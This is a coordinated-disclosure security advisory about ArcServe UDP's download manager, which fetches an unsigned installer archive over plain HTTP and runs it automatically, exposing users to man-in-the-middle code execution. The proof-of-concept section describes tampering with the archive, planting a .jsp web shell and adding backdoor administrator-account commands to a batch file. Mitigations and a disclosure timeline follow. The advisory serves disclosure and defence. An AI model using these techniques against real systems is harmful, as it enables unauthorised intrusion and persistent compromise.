Title: ArcServe UDP - MiTM CWE Class: CWE-300: Channel Accessible by Non-Endpoint ('Man-in-the-Middle') | CWE-319: Cleartext Transmission of Sensitive Information Date: 04/09/2016 Vendor: ArcServe Product: ArcServe UDP Standard Edition for Windows, TRIAL Type: Backup Software Version: 6.0.3792 Update 2 Build 516 Download URL: http://arcserve.com/free-backup-software-trial/ Tested on: Windows 7x86 EN Release Mode: coordinated release - 1. Product Description: - A comprehensive solution that empowers even a one-person IT department to protect virtual and physical environments with a high degree of simplicity: Design and manage your entire data protection strategy with a unified management console Scale your data backup coverage as your organization grows with the push of a button - 2. Vulnerability Details: - The download manager (ASDownloader) obtains installation files (a zip archive) over HTTP. Once obtained the archive is extracted and Setup.exe is automatically executed. The zip archive is not signed nor is a hash provided/checked. Setup.exe and most other files inside the archive are signed by Arcserve but not validated before execution. As HTTP is used an adversary positioned between the server and end-user could intercept traffic and modify the archive. Due to a lack of integrity checking the modified archive can be used to obtain (covert) code execution. Adversaries would have to be in the position to intercept HTTP traffic the Arcserve server and end-user installing the product. Some scenario's: - Insecure wifi (e.g. a restaurant/hotel or badly configured corporate network) - Compromised network (e.g. corporate LAN / home LAN: see recent NSA exploits / IoT insecurity) - Rogue ISP / nation state actors - 3. PoC Details: - Step 1: Understanding the download manager The download manager requires administrative privileges and upon execution will allow the user to specify which product to download. Testing has been performed for the Arcserve UDP Standard edition. Once selected and a download location on the local drive is set the download manager generates the following traffic: Protocol: HTTP Hosts and Files: downloads.arcserve.comproducts/Arcserve_UDP_v6.0/GA/Single_Installer/Update.xml (returns 404 not found) downloads.arcserve.comproducts/Arcserve_UDP_v6.0/GA/Single_Installer/config.xml (returns xml file) downloads.arcserve.comproducts/arcserveudp/v6u2/Single_Installer/r6.0/Arcserve_UDP.zip (returns the zip) Within the XML file various information is listed however it provides no integrity checking for the archive. There are MD5 fields but these are empty. Even when used an adversary could simply replace them. The archive contains the actual installation files and could also be obtained directly without the use of the download manager. Once the download process is complete the archive gets extracted and Setup.exe will be invoked. This in turn launches MasterSetup.exe Step 2: Intercepting and modify HTTP Communications We all know how to do this. Serve a normal zip file to ensure everything is working. Now let's create a payload. Step 3: Payload Creation Let's make a custom payload to infect the system. We have two options: #1. Create a custom archive A. Create a malicous executable, name it setup.exe or installer.exe and modify properties to reflect a legit Arcserve binary. B. Place it in a directory called Arcserve_UDP C. Re-use autorun.inf setup.ico and setup.ini from the original archive D. Modify setup.ini to commandline=Setup.exe E. Add it to a ZIP archive. F. Serve it over HTTP to the installer. Installer will extract the archive and launch the malicious executable. The downside with this technique is: the user will never see Arcserve UDP on his system and knows something is wrong. #2. Modify the original Arcserve_UDP.zip A more covert approach is to create a malicious exe and overwrite setup.exe or MasterSetup.exe and recreate the zip-file. It looks more legit as most files are present, however this also fails to install the actual Arcserve UDP software. Here are three examples to obtain covert code execution: Exploiting the web-service: A. Extract the original archive B. Browse to Arcserve_UDPD2DCommonD2DUIcontents C. Place a .jsp web-shell in this directory, I used a simple shell which processes commands D. Re-create the zip-file. This could give a SYSTEM level web-shell from the Arcserve UDP Agent web-console without needing any authentication. http://localhost:[port]/contents/cmd.jsp Exploit the batch-file (which is unsigned): A. Extract the original archive B. Browse to: Arcserve_UDPIntelNTLICENSElic98_keygen_3updateProdCodes.bat C. Add code, for example create an administrative user: net user attacker mypassword /add net localgroup Administrators attacker /add D. Re-create the zip-file This will add an administrative user to the local system. Plant a DLL file as the setup files are vulnerable to DLL Hijacking: A. For details see the DLL hijack advisory. D. Re-create the zip-file This could add an administrative user to the local system or connect to the adversary over internet. - 4. Vendor Mitigation: - Distribute installation and update-files over a secure connection e.g. HTTPS. Provide a file-hash for any files offered for download so end-users can validate integrity. Sign the archive and validate the signature before extraction. Validate the setup.exe signature before execution. When executables invoke other application executables, validate the signature before execution. - 5. End-user Mitigation: - A patch has been released by Arcserve. All customer should upgrade to the latest version as described in the release notes: http://documentation.arcserve.com/Arcserve-UDP/Available/V6/ENU/Bookshelf_Files/HTML/Update3/Default.htm#Update3/upd3_Issues_Fixed.htm%3FTocPath%3D_____6 - 6. Update Process Note: - The update process has also been audited but could not be abused. It obtains files over HTTP however before execution it will validate the file signature: CBaseUpdateJob::downloadFile: Download file returned 0 CCryptography::VerifyEmbeddedSignature: Start to Verifying Embedded Signature of file [C:Program FilesArcserveUnified Data ProtectionUpdate ManagerEngineUpdates\r6.0.downloadingAvailableUpdateInfo.dll] CCryptography::VerifyEmbeddedSignature: WinVerifyTrust returned [0] CCryptography::VerifyEmbeddedSignature: The file is signed and the signature was verified. CCryptography::IsCertificateOrganizationNameValid: Start to verify Certificate Organisation of file C:Program FilesArcserveUnified Data ProtectionUpdate ManagerEngineUpdates\r6.0.downloadingAvailableUpdateInfo.dll - 7. Author: - sh4d0wman / Herman Groeneveld herman_worldwide AT hotmail. com - 8. Timeline: - * 01/06/2016: Vulnerability discovery * 18/06/2016: Request sent to info@arcserve.com for a security point-of-contact * 21/06/2016: Received contact but no secure channel. Requested confirmation to send PoC over unsecure channel * 22/06/2016: vendor supplied PGP key, vulnerability PoC sent * 09/07/2016: Received information: 2 out of 3 issues have fixes pending. Vendor requests additional mitigation techniques for the third issue. * 13/07/2016: Sent vendor various mitigation solutions and their limitations. * 13/08/2016: Vendor informs release is pending for all discovered issues. * 15/08/2016: Vendor requests text for release bulletin. * 19/08/2016: A fix has been released.